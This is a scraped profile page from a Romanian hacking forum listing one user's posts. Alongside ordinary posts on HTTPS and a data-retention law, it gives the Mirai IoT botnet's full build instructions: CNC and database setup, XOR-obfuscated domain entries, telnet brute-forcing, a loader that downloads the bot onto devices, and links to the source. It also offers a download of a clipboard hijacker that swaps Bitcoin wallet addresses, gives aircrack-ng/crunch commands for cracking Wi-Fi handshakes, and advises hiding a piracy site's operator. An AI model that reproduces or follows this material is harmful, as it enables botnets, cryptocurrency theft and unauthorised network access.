Jump to content

Technetium

Active Members
 View Profile  See their activity

  • Posts

    507

  • Joined

  • Last visited

  • Days Won

    10

 Content Type 

Posts posted by Technetium

  1. Decodare fisier

    in Programare

    Posted · Edited by Technetium

    6 hours ago, kidink said:

    îmi miroase a carding.

     

    Cand faci o afirmatie, argumenteaza.

    Tu declari tot ce castigi pe net? Asta e problema noastra, stim doar sa bem bere, sa spargem seminte, sa stam la colt de scara, sa barfim si sa-i judecam pe altii.

    kingwz site:extreamcs.com - vad ca ai mai vandut chestii, te dau la Fisc, ce zici?

     

     

    • Upvote 3
    • Downvote 1

  2. Care e treaba cu HTTPS ?

    in Discutii incepatori

    Posted

    Security - encryption, data integrity (data can’t be corrupted), authentication (prevents MiTM)

    Performance - HTTP/2; reduced load time

    HTTPS is a ranking factor.

    Referral data - daca tu-ti faci reclama pe Reddit care are HTTPS si traficul vine de acolo si tu ai HTTP, referral data va fi blocat in Google Analytics. Pot dezvolta aici da' n-am chef :)

     

    Daca ai un simplu blog, fara payment system si nu sunt introduse date sensibile de catre utilizatori, atunci n-ai nevoie de HTTPS.

    Pentru HTTPS iti trebuie un certificat SSL, cum ti-a scris @curiosul, pe care-l instalezi la tine pe sait - gasesti informatii cu sutele cum sa procedezi, n-ai cum sa dai gres.

    • Upvote 1

  6. monetizare si ascundere identitate site piraterie

    in Black SEO & monetizare

    Posted

    3 hours ago, BidiCooL said:

    Salut si bine v-am regasit .

    Imi cer scuze daca nu postez unde trebuie.

     

    M-ar interesa si pe mine niste informatii cu privire la site-urile "nu prea legale" ca cele de filme online, porno si asa mai departe.

    Am observat ca din ce in ce sunt mai pusi pe inchis site-urile de genul... cum ai putea evita sa nu te gaseasca?

    Ok cumperi un domeniu, il gazduiesti, asta fara sa iti dai datele personale, dar trebuie monetizat. Ma gandesc ca aici trebuie sa iti dai datele personale altfel nu vad cum ai putea sa iti retragi banii decat prin bitcoins, ceea ce as vrea sa evit.

    Stiti cumva cum sau unde pot face treaba asta? sau cum sta exact problema?

    @DuTy^ Omul da in cap, ce face? A pus o intrebare pertinenta. Daca stii si vrei sa-l ajuti, il ajuti. Daca nu, te abtii. Democratia asta! Numai lupi moralisti pe aici!

    Tu declari tot ce castigi din freelancing?

    Ajutor, Ajutor, Ajutor, Market, Cereri, Stiri, Stiri, Ajutor, Off-topic. Cam asa stau lucrurile vad. Adica un leecher la puterea a treia.

     

    http://www.cultcinema.net

    Il gasesti aici pe baiat.

    • Upvote 1

  7. Legea Big Brother - updates

    in Stiri securitate

    Posted · Edited by Technetium

    Datele de trafic ale abonatilor, pe care le pastreaza in prezent operatorii de telefonie si internet, vor fi stocate timp de maximum trei ani, potrivit unui act normativ publicat miercuri in Monitorul Oficial. In acelasi timp, regulile noi prevad ca aceste date vor fi accesate doar in baza unei autorizari judecatoresti.

     

    Furnizorii de servicii de comunicatii electronice destinate publicului si furnizorii de retele publice de comunicatii electronice au obligaţia sa puna la dispozitia acestora, de indata, dar nu mai tarziu de 48 de ore, datele de trafic, datele de identificare a echipamentului si datele de localizare, in conformitate cu prevederile referitoare la protectia datelor cu caracter personal.

     

    In plus, o noua prevedere stabileste ca datele de trafic, datele de identificare a echipamentului si datele de localizare solicitate nu vor putea fi sterse sau anonimizate de catre furnizori, atunci cand solicitarea este insotita de o notificare cu privire la necesitatea mentinerii lor. Cu toate acestea, ele nu vor putea fi pastrate mai mult de cinci ani de la data solicitarii sau, după caz, pana la pronuntarea unei hotarari definitive a instantei de judecata.

     

    Legea nr. 235/2015 pentru modificarea si completarea Legii nr. 506/2004 privind prelucrarea datelor cu caracter personal si protectia vietii private in sectorul comunicatiilor electronice a fost publicata in Monitorul Oficial, Partea I, nr. 767 din 14 octombrie si va intra in vigoare sambata.

     

    Mai multe informatii, aici.

    Documentul oficial in format .pdf aici. - poate il are cineva si binevoieste sa-l "share-uiasca" cu noi.

    • Upvote 1

  9. BitcoinBuster by Becks

    in Cosul de gunoi

    Posted · Edited by Technetium

    The tool, after you built it, scans the clipboard for a wallet, where most of them are stored before sending coins from A to B. If a wallet is found, it replaces it with the one from the tool. You can enter your wallet in the builder.
    Both, builder and stub, are coded in pure C++ and they only use the winapi. When you want to spread it use the autostart of your crypter.

     

    demo:

    http://imgur.com/qgnhSdp

     

    https://www.sendspace.com/file/y610su

    pass Basescu: cnN0Zm9ydW1z

  17. Source Code for IoT Botnet ‘Mirai’ Released

    in Stiri securitate

    Posted

    Requirements

    Quote

     

    Bare Minimum
    2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

    Pro Setup
    2 VPS and 4 servers
    - 1 VPS with extremely bulletproof host for database server
    - 1 VPS, rootkitted, for scanReceiver and distributor
    - 1 server for CNC (used like 2% CPU with 400k bots)
    - 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

     


    Infrastructure Overview

    Quote

     

    - To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
    - Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
    - Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utitlity scanListen binary appear in debug folder.

    Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.

    The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections - in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.

     


    Configuring Bot
    Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

    - TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards :)
    - TABLE_CNC_PORT - Port to connect to, its set to 23 already
    - TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to
    - TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101 already.

    In ./mirai/tools you will find something called enc.c - You must compile this to output things to put in the table.c file

    Run this inside mirai directory: 

    ./build.sh debug telnet

    You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won't affect compiling the enc tool

    Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this: 

    ./debug/enc string fuck.the.police.com

    The output should look like this:
    XOR'ing 20 bytes of data...
    \x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22

    To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR'ing 20 bytes of data". This value must replace the last argument as well. So for example, the table.c line originally looks like this: 

    add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com

    Now that we know value from enc tool, we update it like this: 

    add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22", 20); // fuck.the.police.com

    Some values are strings, some are port (uint16 in network order / big endian).


    Configuring CNC 

    apt-get install mysql-server mysql-client

    CNC requires database to work. When you install database, go into it and run following commands:
    http://pastebin.com/86d0iL9g

    This will create database for you. To add your user: 

    INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, '');

    Now, go into file ./mirai/cnc/main.go
    Edit these values: 

    const DatabaseAddr string   = "127.0.0.1"
const DatabaseUser string   = "root"
const DatabasePass string   = "password"
const DatabaseTable string  = "mirai"

    To the information for the mysql server you just installed.


    Setting Up Cross Compilers
    Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.

    http://pastebin.com/1rRCc3aD


    Building CNC+Bot
    The CNC, bot, and related tools:
    1) http://santasbigcandycane.cx/mirai.src.zip
    2) http://santasbigcandycane.cx/loader.src.zip

     

    How to build bot + CNC
    In mirai folder, there is build.sh script. 

    ./build.sh debug telnet

    Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder 

    ./build.sh release telnet

    Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/release folder


    Building Echo Loader
    Loader reads telnet entries from STDIN in following format:
    ip:port user:pass

    It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget. You can find code to compile the tiny downloader stub here:
    http://santasbigcandycane.cx/dlr.src.zip

    You need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb binary, which download the real binary, since echo loading really slow.
    When you compile, place your dlr.* files into the folder ./bins for the loader 

    ./build.sh

    Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this: 

    cat file.txt | ./loader

     

    E mai usor asa pentru cei ce nu au cont pe hackforums, nu vor sau nu pot sa intre.

    • Upvote 1

  21. handshake cap.

    in Wireless Pentesting

    Posted · Edited by Technetium

    Atacul atat de mult dezbatut ce numeste "Evil Twin", si nu este ceva foarte complicat cum descriu toti "profesorii" de pe aici. Trebuie doar sa te documentezi si sa pui in practica ceea ce ai citit. Sunt o gramada de forumuri, bloguri, etc cu tutoriale care explica in detaliu ceea ce trebuie sa faci. Iti las cateva resurse: de pe null-byte aici si aici, altele aici si aici.

    Prea multe informatii nu ne-ai dat...Are WPS enabled? In ce tara esti? Modelul router-ului?

    Tara in care esti conteaza atunci cand crack-uiesti handshake-ul, dictionary attack (brute force).

    Foarte multi, in tarile straine, isi folosesc ca parola (8 digits):

    1. Numerele de telefon

    Pentru asta ai Crunch (mai jos un exemplu pentru numere de telefon care incep cu 22) 

    crunch 8 8 -t 22%%%%%% -u|aircrack-ng -b aa:bb:cc:dd:ee:ff -w - /root/handshake.cap

    Informatii despre Crunch gasesti pe forumul de la Kali Linux, citeste si aici

    2. Data nasterii, iti las un script, wordlist manipulator aici

    Apoi creezi o lista cu date de nastere: 

    aircrack-ng -w /root/birthdates.txt handshake.cap

     

×
×
  • Create New...